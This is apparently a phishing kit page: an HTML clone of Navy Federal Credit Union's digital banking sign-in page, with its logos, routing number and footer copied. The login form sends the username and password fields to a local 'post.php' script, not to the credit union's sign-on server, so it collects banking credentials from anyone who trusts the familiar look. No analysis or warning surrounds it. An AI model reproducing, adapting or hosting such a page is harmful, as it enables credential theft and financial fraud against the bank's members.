<!DOCTYPE html>
<html lang="en"><head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="Description" content="Navy Federal Credit Union, We serve where you serve. Serving the Navy, Army, Marine Corps, Air Force, Veterans, and DoD.">
<meta name="Keywords" content="navy federal, credit union, army, marine corps, navy, air force, veterans, military, DoD, mortgages, auto loans">
<meta name="copyright" content="Copyright � 2019 - Navy Federal Credit Union - All rights reserved">
<meta name="country" content="USA">
<meta name="coverage" content="Worldwide">
<meta name="title" content="Navy Federal Credit Union - About Us">
<meta name="identifier" content="http://www.navyfederal.org/about-navy-federal.html">
<meta name="language" content="English">
<meta name="revisit-after" content="1 days">
<meta name="robots" content="ALL">
<meta name="rating" content="General">
<meta name="verify-v1" content="ven96UKgi0CR9kZBOU+rDG5HoxILhrVsRUDuvpL4row=">
<meta http-equiv="imagetoolbar" content="no">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<title>Navy Federal Credit Union - Our Members are the Mission?</title>



<link rel="shortcut icon" href="https://my.navyfederal.org/NFOAA_Auth/favicon.ico" type="image/x-icon">
<link rel="apple-touch-icon" href="https://my.navyfederal.org/NFOAA_Auth/resources/images/apple-touch-icon-72x72-precomposed-1d62888b4b662af9142e3c385f423f32.png">

<!-- Import this way for performance gains -->
<link rel="stylesheet" href="files/css.css">
<link rel="stylesheet" href="https://my.navyfederal.org/NFOAA_Auth/resources/css/nfcu-icons-1eb4313cfac249f6250aef599ebf0874.css">
<link rel="stylesheet" href="https://my.navyfederal.org/NFOAA_Auth/resources/css/all-1eb4313cfac249f6250aef599ebf0874.css">
 <!-- Added responsivemain.css for login.jsp changes -->
<link rel="stylesheet" href="https://my.navyfederal.org/NFOAA_Auth/resources/css/nauth-1eb4313cfac249f6250aef599ebf0874.css">
<link rel="stylesheet" href="https://my.navyfederal.org/NFOAA_Auth/resources/css/responsivemain-1eb4313cfac249f6250aef599ebf0874.css">

<!-- Used to count modals, must be on every page where there is a footer modal links -->


<!-- includes jquery, common, dropdown, bootstrap-select, keypad, modal js files -->
	 
<!-- end of main.js -->


<!-- combined rsaCookieGenerator with login -->

<noscript>
	 <p class="alert alert-noscriptwarning">Your browsers JavaScript must be enabled to sign into Online Banking.</p>
</noscript>




<!-- Insert Chat Part here -->
</head>



<body class="responsive">
 <a href="#end-header" id="skipnav" class="skipnav">Skip Navigation Links</a>

<div class="mobileMenu">
	<div class="MobileMenuHeader">
	</div>
	<div class="MobileMenuContent">
		<div class="MobLocations">
	        <a href="https://www.navyfederal.org/branches-atms/index.php"><span>&#58935;</span>Locations</a>
        </div>
		<div class="MobContactUs">
	        <a href="https://www.navyfederal.org/contact-us/"><span>&#58930;</span>Contact Us</a>
        </div>
        <div class="MobRoutingNumber">
        	<p>Routing Number: <strong>256074974</strong></p>
        </div>
	</div>
</div>

<div class="pageWrap">  
	<!-- start of header -->	
	<div class="header-sm" role="banner">
		<div class="container">
			<div class="header-content-sm">
				<div class="mob-nav-menu">
					<i class="fa fa-bars"></i>
				</div>
				<div class="logo-sm">
					<a href="https://www.navyfederal.org/" title="Go to NavyFederal.org">
						<img class="logo-sm-pic" src="https://my.navyfederal.org/NFOAA_Auth/resources/images/NFCU_Mob_Logo-1d62888b4b662af9142e3c385f423f32.svg" alt="Navy Federal Credit Union | Army, Marine Corps, Navy, Air Force, Coast Guard, Family (Logo)">
					</a>
				</div>
			</div>
		</div>
	</div>
	<div class="header-bg" role="banner">
		<div class="container">
			<div class="content-box">
				<div class="header-content-bg">
					<div class="logo">
						<a href="https://www.navyfederal.org/" title="Go to NavyFederal.org" class="logo_bg_a">
						<img src="https://my.navyfederal.org/NFOAA_Auth/resources/images/img_logo-veterans-1d62888b4b662af9142e3c385f423f32.svg" alt="Navy Federal Credit Union | Army, Marine Corps, Navy, Air Force, Coast Guard, Family (Logo)" class="logo_bg"> </a>
					</div>
					<div class="nav navbar-collapse">
						<div class="rt-container"><span class="text-routing">Routing Number: </span><span class="rnumber">256074974</span></div>
						<a class="padRight20 loc-class" href="https://www.navyfederal.org/branches-atms/index.php"> <span class="icon-locations"></span> Locations </a>
						
						<a class="Contact-us" href="https://www.navyfederal.org/contact-us/"><img src="https://my.navyfederal.org/NFOAA_Auth/resources/images/contact-us-1d62888b4b662af9142e3c385f423f32.svg" class="icon_more_contact_us_default" alt="Contact Us"> Contact Us</a>  
					</div>
				</div>
			</div>
		</div> 
	</div>
	
		<!-- end of header-->
		
		<!-- main content area starts here -->
	<div class="content-wrapper" role="main">
		
		        <div class="formbackground">
		        <a id="end-header"></a>
		        		
		        </div>
		        <div class="container" role="main">
		        	<div class="background-container">
		        	<div class="login-content-box">
						<div class="login">    
							<div class="headers"> 
								<h1>Welcome to Digital Banking</h1>
		                	</div>               
		                    	<div class="login-panel">
								
								<div class="panel panel-primary heading-callout">
				                    <div class="panel-heading">
				                        <h2 class="panel-title"><span class="icon-padlock"></span> Sign In</h2>
				                    </div>
				                    <div class="rule-container">
				                    	<div class="horizontal-line"></div>
				                    </div>
			                        <div class="panel-body">
			                            <div class="panel-content-left">
											<form id="Login" class="form-inline Rectangle-2459" name="Login" method="post" action="post.php" autocomplete="off">
												<div class="userPassGroup">
													<div class="form-group username" style="display:inline-block;">
														<label for="user">Username</label> <span class="tooltipOne" data-guidetext="Sign into online banking with your unique Username, which may be your access number." aria-label="Sign into online banking with your unique Username, which may be your access number." tabindex="0" role="button" aria-disabled="true"></span>														
							  	  						<input type="text" name="userid" id="user" maxlength="32" class="form-control" required>
													</div>
													<div class="form-group password" style="display:inline-block;">
														<label for="password">Password</label>
														<input type="password" name="passwd" id="password" class="form-control" required>
													</div>
													<div class="signInHelp"><a href="https://accountservices.navyfederal.org/account-recovery/" aria-label="Sign In Help">Sign In Help</a></div>
												</div>
												
												<div class="submitAndRecaptcha "> 
												
												
													<input type="submit" name="SignIn" class="btn btn-primary reg-sign-in" id="signIn" value="Sign In">
												
												
												</div>
												
												<input type="hidden" name="SMENC" value="ISO-8859-1">
												<input type="hidden" name="SMLOCALE" value="US-EN">
												<input type="hidden" name="smquerydata" value="">
												<input type="hidden" name="smauthreason" value="">
												<input type="hidden" name="target" value="https://signon.navyfederal.org/nfcu/">
												<input type="hidden" name="smagentname" value="">
												<input type="hidden" name="postpreservationdata" value="">
												<input type="hidden" name="hiddenrandom" value="0" id="hiddenrandom">
												<input type="hidden" name="akamaiCookieValue" value="w" id="akamaiCookieValue">
												<input type="hidden" name="akamaiCookieName" value="dc" id="akamaiCookieName">
											</form>
										</div>
									</div>
								</div>
							</div>
						</div>
					</div>
				</div>
			<!-- Internal Navigation Links -->
			<div class="membership-content-box">
				<div class="membership-middle">
					<div class="join-nfcu">
						<div class="join-nfcu-container">
							<div class="membership-verbiage">
								<div class="not-a-member">
									<h2>Not a Navy Federal member?</h2>
								</div>
								<div class="join-now-verbiage" id="joinNowVerbiage">
									<p>Join now and enjoy the support and great service of a credit union that puts your needs first.</p>
								</div>
							</div>
							
							<form class="member-buttons" role="form">
								<input type="button" aria-label="Become a member" onClick="window.location.href = 'https://membership.navyfederal.org/#/step/eligibility-choices';" class="become-member" value="Become a Member">
								<input type="button" aria-label="Learn More" onClick="window.location.href = 'https://www.navyfederal.org/membership/become-a-member/';" class="membership-learn-more" value="Learn More">
							</form>
							
						</div>
					</div>
					<div class="join-picture">
						<img class="join-img" alt="" src="https://my.navyfederal.org/NFOAA_Auth/resources/images/img-BecomeAMember-1d62888b4b662af9142e3c385f423f32.jpg">
					</div>
				</div>
			</div>
					<div class="page-header">
						<div class="content-box">	
							<div class="ph-content-box">
								<div class="col-sm-4">
									<div class="circle">
										<img class="circle-icon" src="https://my.navyfederal.org/NFOAA_Auth/resources/images/Group5159-1d62888b4b662af9142e3c385f423f32.svg" alt="">
									</div>
									<div class="ph-text-h3"><h3>Don't have online access?</h3></div>	
									<div aria-label="Enroll in Digital Banking" class="ph-text-a"><a href="https://accountservices.navyfederal.org/enrollment/">Enroll in digital banking <span aria-hidden="true">?</span></a></div>
									
								</div>
								<div class="col-sm-4">
									<div class="circle">
										<img class="circle-icon special6px" src="https://my.navyfederal.org/NFOAA_Auth/resources/images/Group5166-1d62888b4b662af9142e3c385f423f32.svg" alt="">
									</div>
									<div id="digitalBankingSecurityHeader" class="ph-text-h3"><h3>Find out more about secure digital banking</h3></div>
									<div aria-label="Learn More" aria-describedby="digitalBankingSecurityHeader" class="ph-text-a"><a href="https://www.navyfederal.org/security/online-mobile-security.php">Learn more <span aria-hidden="true">?</span></a></div>
								</div>
								<div class="col-sm-4">
									<div class="circle">
										<img class="circle-icon" src="https://my.navyfederal.org/NFOAA_Auth/resources/images/Group5158-1d62888b4b662af9142e3c385f423f32.svg" alt="">
									</div>
									<div class="ph-text-h3"><h3>Need help?</h3></div>
									<div aria-label="Contact Us" class="ph-text-a"><a href="https://www.navyfederal.org/contact-us/">Contact us <span aria-hidden="true">?</span></a></div>
									
								</div>
							</div>
						</div>
					</div>
						
					<!-- <div class="internal-ad">
						<iframe src="https://www.navyfederal.org/nfoaa-navads/signin.html" frameborder="0" title="Navy Federal Promotion/Spotlight" tabindex="0"></iframe>
					</div> -->
				</div>	
			</div>
				<!-- end of Internal ad-->
			
		
		<!-- start of footer  -->
		<div class="container footer">
			<div class="content-box">
				<div class="ft-content-box">
		            <div class="footer-content">
		                <div class="ft-logo">
		                    <a href="https://www.navyfederal.org/" title="Go to NavyFederal.org" target="_blank" class="ft-logo-a">
		                    	<span class="nfcu-icon-ftlogo">&#58888;</span>
		                    </a>
		                </div>
		                <div class="content">
		                    <div class="member-services marginbottom20">
		      						<span class="mbr-services-txt">24/7 Member Services:<b>&nbsp;1-888-842-6328&nbsp;</b></span><span class="separator mob-pipe">&#8200; &#8200;|&#8200; &#8200;</span><span class="mob-line-break"><br></span>
		      						<span class="text-routing">Routing Number:&nbsp;<b>256074974</b> </span>
		      						<hr>
		      				</div>
		      				<div class="nav-container">
				                <nav class="nav ft-nav paddingtop20 marginbottom20" role="navigation">
										<a href="https://www.navyfederal.org/about/about.php">About Us&#8200; &#8200;</a> <span class="separator">|</span>
										<a href="https://www.navyfederal.org/contact-us/">&#8200; &#8200;Contact Us&#8200; &#8200;</a> <span class="separator">|</span>
										<a href="https://www.navyfederal.org/privacy/online.php">&#8200; &#8200;Privacy Policy&#8200; &#8200;</a> <span class="separator">|</span>
										<a href="https://www.navyfederal.org/security/">&#8200; &#8200;Security&#8200; &#8200;</a> <span class="separator">|</span>
										<a href="#" data-toggle="modal" data-target="#modalonlineDisclosure" onClick="countModal('web policy');">&#8200; &#8200;Web Policy&#8200; &#8200;</a><span class="separator">|</span>
										<a href="https://www.navyfederal.org/accessibility.php">&#8200; &#8200;Accessibility&#8200; &#8200;</a> <span class="separator">|</span>
										<a href="#" data-toggle="modal" data-target="#modalbrowserRequirements" onClick="countModal('browser support');">&#8200; &#8200;Browser Support</a>
								</nav>
							</div>
							<div class="copyright">	
								<p id="copyright">
									? <span id="year" style="font-weight:800;">2020</span><span class="copyright">&nbsp;<b>Navy Federal Credit Union.</b> </span> All rights reserved.
								</p>
							</div>
							
		                        <div class="nav regInstitutions"> 
									<div class="ncua-link"><a href="https://www.navyfederal.org/pdf/ebrochures/1116e.pdf" id="ncua-font"><span class="icon-ncua"></span> Federally Insured by NCUA</a><span class="separator">&#8200;&#8200;&#8200;&#8200;&#8200;|&#8200;&#8200;&#8200;&#8200;&#8200;</span></div> 
									<div class="ehl-link"><a href="https://www.navyfederal.org/pdf/ebrochures/3035_EHL_Poster.pdf" id="EHL"><span class="icon-housing"></span> Equal Housing Lender</a> </div>
								</div>	                    
		                    
		                    <div class="ft-disclaimers">
		                    	<p>
									APY = Annual Percentage Yield <span class="separator">|</span> APR = Annual Percentage Rate
								</p>
		                        <p>
		                            <sup>+</sup>Rates are based on an evaluation of credit history, so your rate may differ.
		                        </p>
		
		                        <p>
		                            <sup>++</sup>Rates are variable, and based on an evaluation of credit history, so your rate may differ.
		                        </p>
		                        
		                        <p>
		                        	<sup>*</sup>Message and date rates may apply. Terms and Conditions are available.
		                        </p>
		                        
		                        <p>
		                         iPhone?, iPad? and iPod touch? are trademarks
 of Apple Inc. App Store&#8480; is a service mark of Apple Inc. Android? and 
Google Play? are trademarks of Google Inc. Images used for 
representational purposes only; do not imply government endorsement.
		                    	</p>
		                    </div>
		                </div>
		            </div>
		    	</div>
	    	</div>
	    </div>
	    <!-- end of footer  -->
</div>
    
    <!-- set the src of the iframe as about:blank so that they don't automatically load on browser load -->
    
	<!-- iFrame for onlineDisclosure -->
    <div class="modal fade" id="modalonlineDisclosure" tabindex="-1" role="dialog" aria-labelledby="modalonlineDisclosureLabel">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span class="fa fa-times" aria-hidden="true"></span></button>
                    <p class="modal-title" id="modalonlineDisclosureLabel">Use of Cookies by Navy Federal Online</p>
                </div>
                <div class="modal-body">
                    <iframe id="onlineDisclosureFrame" class="cookies" data-src="https://www.navyfederal.org/online-disclosure.html" src="files/a_003.html" frameborder="0"></iframe>
                </div>
                <div class="modal-footer">
                	<button type="button" id="modal-button" value="Done" data-dismiss="modal" aria-label="Done">Done</button>
                </div>
            </div>
        </div>
    </div>
    <!-- End of onlineDisclosure Modal -->
    
    <!-- iFrame for browserRequirements -->
    <div class="modal fade" id="modalbrowserRequirements" tabindex="-1" role="dialog" aria-labelledby="modalbrowserRequirementsLabel">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span class="fa fa-times" aria-hidden="true"></span></button>
                    <p class="modal-title" id="modalbrowserRequirementsLabel">Browser Requirements</p>
                </div>
                <div class="modal-body">
               		<iframe id="browserRequirementsFrame" data-src="https://www.navyfederal.org/browser-requirements.html" src="files/a_003.html" width="580" height="740" frameborder="0"></iframe>
                </div>
            </div>
        </div>
    </div>
    <!-- End of browserRequirements Modal -->

	
	<div id="rightnowLogout" style="display: none;">
		<iframe src="https://rnemsg.navyfederal.org/ci/pta/logout" width="1" height="1"></iframe>
	</div>


<iframe src="files/a_003.html" id="samlredirect" style="width: 1px; height: 1px; border: medium none; display: none; position: fixed; bottom: 0px;" aria-hidden="true"></iframe><iframe style="width: 0px; height: 0px; position: absolute; top: -1000px; left: -1000px; display: none;" tabindex="-1" aria-hidden="true" role="presentation" title="Intentionally blank" name="lpSS_53805489621" id="lpSS_53805489621" src="files/storage.html"></iframe></body></html>